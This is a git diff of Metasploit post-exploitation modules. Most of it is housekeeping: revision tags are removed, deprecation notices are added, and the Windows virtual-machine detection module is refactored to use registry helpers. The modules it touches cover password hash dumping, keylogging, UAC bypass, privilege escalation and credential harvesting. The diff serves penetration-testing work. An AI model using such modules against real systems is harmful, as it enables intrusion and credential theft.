QEMU/KVM.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'solaris' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/solaris/gather/enum_packages.rb b/modules/post/solaris/gather/enum_packages.rb index 5d522d7143..529f028ebb 100644 --- a/modules/post/solaris/gather/enum_packages.rb +++ b/modules/post/solaris/gather/enum_packages.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to enumerate installed packages on a Solaris System}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'solaris' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/solaris/gather/enum_services.rb b/modules/post/solaris/gather/enum_services.rb index c635a11bf2..d3bc5b41b2 100644 --- a/modules/post/solaris/gather/enum_services.rb +++ b/modules/post/solaris/gather/enum_services.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to enumerate services on a Solaris System}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'solaris' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/solaris/gather/hashdump.rb b/modules/post/solaris/gather/hashdump.rb index cdf975e3f6..82be01d6ac 100644 --- a/modules/post/solaris/gather/hashdump.rb +++ b/modules/post/solaris/gather/hashdump.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to dump the password hashes for all users on a Solaris System}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'solaris' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index d0010eeb5d..b1f1b0857b 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter', ] diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index b0f2212751..ba091e24df 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Post false sense of security to the user.}, 'License' => MSF_LICENSE, 'Author' => [ 'mubix', 'cg' ], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'References' => [['URL', 'http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html']] diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 209f7c4d78..921a1cfa61 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -14,6 +10,10 @@ require 'rex' class Metasploit3 < Msf::Post + require 'msf/core/module/deprecated' + include Msf::Module::Deprecated + deprecated Date.new(2013,1,4), "exploit/windows/local/bypassuac" + def initialize(info={}) super( update_info( info, 'Name' => 'Windows Escalate UAC Protection Bypass', @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'David Kennedy "ReL1K" ', 'mitnick' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => [ @@ -41,12 +40,6 @@ class Metasploit3 < Msf::Post end def run - print_error("***********************************************") - print_error("* *") - print_error("* Module will be depricated on Jan 4 2013 *") - print_error("* Please use exploits/windows/local/bypassuac *") - print_error("* *") - print_error("***********************************************") vuln = false sysinfo = session.sys.config.sysinfo winver = sysinfo["OS"] diff --git a/modules/post/windows/escalate/getsystem.rb b/modules/post/windows/escalate/getsystem.rb index cdab6d66ff..3895b486b7 100644 --- a/modules/post/windows/escalate/getsystem.rb +++ b/modules/post/windows/escalate/getsystem.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => 'hdm', - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index c29b7828ba..7a412a7208 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Post 'Ruben Santamarta', # First public exploit 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/escalate/ms10_092_schelevator.rb b/modules/post/windows/escalate/ms10_092_schelevator.rb index 535c0827b9..99b95d9727 100644 --- a/modules/post/windows/escalate/ms10_092_schelevator.rb +++ b/modules/post/windows/escalate/ms10_092_schelevator.rb @@ -12,6 +12,11 @@ require 'zlib' class Metasploit3 < Msf::Post + + require 'msf/core/module/deprecated' + include Msf::Module::Deprecated + deprecated Date.new(2013,6,1), "exploit/windows/local/ms10_092_schelevator" + include Msf::Post::Common def initialize(info={}) @@ -29,7 +34,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb index 43bd752774..1c54990055 100644 --- a/modules/post/windows/escalate/net_runtime_modify.rb +++ b/modules/post/windows/escalate/net_runtime_modify.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,7 +11,7 @@ require 'rex' class Metasploit3 < Msf::Post - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services def initialize(info={}) super( update_info( info, @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'bannedit' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb index 190acc99b8..e991f2ea4f 100644 --- a/modules/post/windows/escalate/screen_unlock.rb +++ b/modules/post/windows/escalate/screen_unlock.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Post 'L4teral ', # Meterpreter script 'Metlstorm' # Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16 ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/escalate/service_permissions.rb b/modules/post/windows/escalate/service_permissions.rb index 4aaeed3436..2d217ce4d9 100644 --- a/modules/post/windows/escalate/service_permissions.rb +++ b/modules/post/windows/escalate/service_permissions.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -12,11 +8,14 @@ require 'msf/core' require 'msf/core/post/windows/services' require 'rex' -require 'msf/core//post/windows/services' class Metasploit3 < Msf::Post - include ::Msf::Post::Windows::WindowsServices + require 'msf/core/module/deprecated' + include Msf::Module::Deprecated + deprecated Date.new(2013,1,10), "exploit/windows/local/service_permissions" + + include ::Msf::Post::Windows::Services def initialize(info={}) super( update_info( info, 'Name' => 'Windows Escalate Service Permissions Local Privilege Escalation', @@ -32,7 +31,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'scriptjunkie' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) @@ -47,12 +45,6 @@ class Metasploit3 < Msf::Post end def run - print_error("*********************************************************") - print_error("* *") - print_error("* Module will be depricated on Jan 10 2013 *") - print_error("* Please use exploits/windows/local/service_permissions *") - print_error("* *") - print_error("*********************************************************") print_status("running") lhost = datastore["LHOST"] || Rex::Socket.source_address diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index 5a61c9c863..58279920e6 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Post Meterpreter Session.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index 564127c8c1..17fa022f55 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +22,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'illwill '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index 7b4ecd6fe5..dddf43ab7e 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # post/windows/gather/cachedump.rb ## @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Post 'Maurizio Agazzini ', 'mubix' ], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'References' => [['URL', 'http://lab.mediaservice.net/code/cachedump.rb']] diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index beea92dadd..92e876b31e 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -13,60 +9,75 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' require 'msf/core/post/common' +require 'msf/core/auxiliary/report' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Common + include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Gather Virtual Environment Detection', - 'Description' => %q{ - This module attempts to determine whether the system is running - inside of a virtual environment and if so, which one. This - module supports detectoin of Hyper-V, VMWare, Virtual PC, - VirtualBox, Xen, and QEMU. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ] - )) + 'Name' => 'Windows Gather Virtual Environment Detection', + 'Description' => %q{ + This module attempts to determine whether the system is running + inside of a virtual environment and if so, which one. This + module supports detectoin of Hyper-V, VMWare, Virtual PC, + VirtualBox, Xen, and QEMU. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Carlos Perez '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) end # Method for detecting if it is a Hyper-V VM def hypervchk(session) - begin - vm = false - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ) - sfmsvals = key.enum_key - if sfmsvals.include?("Hyper-V") - vm = true - elsif sfmsvals.include?("VirtualMachine") - vm = true - end - key.close - rescue + vm = false + sfmsvals = registry_enumkeys('HKLM\SOFTWARE\Microsoft') + if sfmsvals and sfmsvals.include?("Hyper-V") + vm = true + elsif sfmsvals and sfmsvals.include?("VirtualMachine") + vm = true end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("vmicheartbeat") - vm = true - elsif srvvals.include?("vmicvss") - vm = true - elsif srvvals.include?("vmicshutdown") - vm = true - elsif srvvals.include?("vmicexchange") - vm = true - end - rescue + if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion') =~ /vrtual/i + vm = true + end + end + if not vm + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\FADT') + if srvvals and srvvals.include?("VRTUAL") + vm = true + end + end + if not vm + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') + if srvvals and srvvals.include?("VRTUAL") + vm = true + end + end + if not vm + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("vmicheartbeat") + vm = true + elsif srvvals and srvvals.include?("vmicvss") + vm = true + elsif srvvals and srvvals.include?("vmicshutdown") + vm = true + elsif srvvals and srvvals.include?("vmicexchange") + vm = true end end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "MS Hyper-V" }, + :update => :unique_data + ) print_status("This is a Hyper-V Virtual Machine") return "MS Hyper-V" end @@ -75,30 +86,26 @@ class Metasploit3 < Msf::Post # Method for checking if it is a VMware VM def vmwarechk(session) vm = false - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("vmdebug") - vm = true - elsif srvvals.include?("vmmouse") - vm = true - elsif srvvals.include?("VMTools") - vm = true - elsif srvvals.include?("VMMEMCTL") - vm = true - end - key.close - rescue + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("vmdebug") + vm = true + elsif srvvals and srvvals.include?("vmmouse") + vm = true + elsif srvvals and srvvals.include?("VMTools") + vm = true + elsif srvvals and srvvals.include?("VMMEMCTL") + vm = true end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') - if key.query_value('Identifier').data.downcase =~ /vmware/ - vm = true - end - rescue + if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System\BIOS','SystemManufacturer') =~ /vmware/i + vm = true + end + end + if not vm + key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' + if registry_getvaldata(key_path,'Identifier') =~ /vmware/i + vm = true end - key.close end if not vm vmwareprocs = [ @@ -113,7 +120,14 @@ class Metasploit3 < Msf::Post end end end + if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "VMware" }, + :update => :unique_data + ) print_status("This is a VMware Virtual Machine") return "VMWare" end @@ -134,22 +148,22 @@ class Metasploit3 < Msf::Post end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key - - if srvvals.include?("vpc-s3") - vm = true - elsif srvvals.include?("vpcuhub") - vm = true - elsif srvvals.include?("msvmmouf") - vm = true - end - key.close - rescue + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("vpc-s3") + vm = true + elsif srvvals and srvvals.include?("vpcuhub") + vm = true + elsif srvvals and srvvals.include?("msvmmouf") + vm = true end end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "VirtualPC" }, + :update => :unique_data + ) print_status("This is a VirtualPC Virtual Machine") return "VirtualPC" end @@ -170,71 +184,53 @@ class Metasploit3 < Msf::Post end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("VBOX__") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\DSDT') + if srvvals and srvvals.include?("VBOX__") + vm = true end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("VBOX__") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\FADT') + if srvvals and srvvals.include?("VBOX__") + vm = true end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("VBOX__") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') + if srvvals and srvvals.include?("VBOX__") + vm = true end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') - if key.query_value('Identifier').data.downcase =~ /vbox/ - vm = true - end - rescue + key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' + if registry_getvaldata(key_path,'Identifier') =~ /vbox/i + vm = true end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System') - if key.query_value('SystemBiosVersion').data.downcase =~ /vbox/ - vm = true - end - rescue + if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion') =~ /vbox/i + vm = true end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("VBoxMouse") - vm = true - elsif srvvals.include?("VBoxGuest") - vm = true - elsif srvvals.include?("VBoxService") - vm = true - elsif srvvals.include?("VBoxSF") - vm = true - end - key.close - rescue + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("VBoxMouse") + vm = true + elsif srvvals and srvvals.include?("VBoxGuest") + vm = true + elsif srvvals and srvvals.include?("VBoxService") + vm = true + elsif srvvals and srvvals.include?("VBoxSF") + vm = true end end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "VirtualBox" }, + :update => :unique_data + ) print_status("This is a Sun VirtualBox Virtual Machine") return "VirtualBox" end @@ -254,55 +250,44 @@ class Metasploit3 < Msf::Post end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("Xen") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\DSDT') + if srvvals and srvvals.include?("Xen") + vm = true end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("Xen") - vm = true - end - rescue + srvvals = registry_enumkeys('HARDWARE\ACPI\FADT') + if srvvals and srvvals.include?("Xen") + vm = true end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("Xen") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') + if srvvals and srvvals.include?("Xen") + vm = true end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("xenevtchn") - vm = true - elsif srvvals.include?("xennet") - vm = true - elsif srvvals.include?("xennet6") - vm = true - elsif srvvals.include?("xensvc") - vm = true - elsif srvvals.include?("xenvdb") - vm = true - end - key.close - rescue + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("xenevtchn") + vm = true + elsif srvvals and srvvals.include?("xennet") + vm = true + elsif srvvals and srvvals.include?("xennet6") + vm = true + elsif srvvals and srvvals.include?("xensvc") + vm = true + elsif srvvals and srvvals.include?("xenvdb") + vm = true end end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "Xen" }, + :update => :unique_data + ) print_status("This is a Xen Virtual Machine") return "Xen" end @@ -311,27 +296,27 @@ class Metasploit3 < Msf::Post def qemuchk(session) vm = false if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') - if key.query_value('Identifier').data.downcase =~ /qemu/ - print_status("This is a QEMU/KVM Virtual Machine") - vm = true - end - rescue + key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' + if registry_getvaldata(key_path,'Identifier') =~ /qemu/i + print_status("This is a QEMU/KVM Virtual Machine") + vm = true end end if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System\CentralProcessor\0') - if key.query_value('ProcessorNameString').data.downcase =~ /qemu/ - print_status("This is a QEMU/KVM Virtual Machine") - vm = true - end - rescue + key_path = 'HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0' + if registry_getvaldata(key_path,'ProcessorNameString') =~ /qemu/i + print_status("This is a QEMU/KVM Virtual Machine") + vm = true end end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "Qemu/KVM" }, + :update => :unique_data + ) return "Qemu/KVM" end end diff --git a/modules/post/windows/gather/credentials/coreftp.rb b/modules/post/windows/gather/credentials/coreftp.rb index 04a2858436..ab3d649e36 100644 --- a/modules/post/windows/gather/credentials/coreftp.rb +++ b/modules/post/windows/gather/credentials/coreftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/credential_collector.rb b/modules/post/windows/gather/credentials/credential_collector.rb index 10a98e86c3..6797429c39 100644 --- a/modules/post/windows/gather/credentials/credential_collector.rb +++ b/modules/post/windows/gather/credentials/credential_collector.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module harvests credentials found on the host and stores them in the database.}, 'License' => MSF_LICENSE, 'Author' => [ 'tebo[at]attackresearch.com'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/gather/credentials/dyndns.rb b/modules/post/windows/gather/credentials/dyndns.rb index b652ac216b..c1af2d3684 100644 --- a/modules/post/windows/gather/credentials/dyndns.rb +++ b/modules/post/windows/gather/credentials/dyndns.rb @@ -1,7 +1,3 @@ -## -#$Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Post 'Shubham Dawra ', #SecurityXploded.com 'sinn3r', #Lots of code rewrite ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index cb98be6083..338864138b 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Post display the username and location. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Kx499'] diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 2363f9ac00..ff188cd141 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Post 'SecurityXploded Team', #www.SecurityXploded.com 'Sil3ntDre4m ', ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index dcc811ebb2..e192bac621 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['Nathan Einwechter '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index cec35249cf..e3abcaeccf 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will collect credentials from the FileZilla FTP server if installed. }, 'License' => MSF_LICENSE, 'Author' => ['bannedit'], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index 3037560284..452f3771ce 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +26,6 @@ class Metasploit3 < Msf::Post finds saved FTP connections in the Sites.dat file. }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/ftpnavigator.rb b/modules/post/windows/gather/credentials/ftpnavigator.rb index ce6ecf7bab..3f8927b1a8 100644 --- a/modules/post/windows/gather/credentials/ftpnavigator.rb +++ b/modules/post/windows/gather/credentials/ftpnavigator.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => "$Revision$", 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index af4f0394c7..6398bf3420 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Post 'sil3ntdre4m ', 'SecurityXploded Team ' ], - 'Version' => '$Revision$', 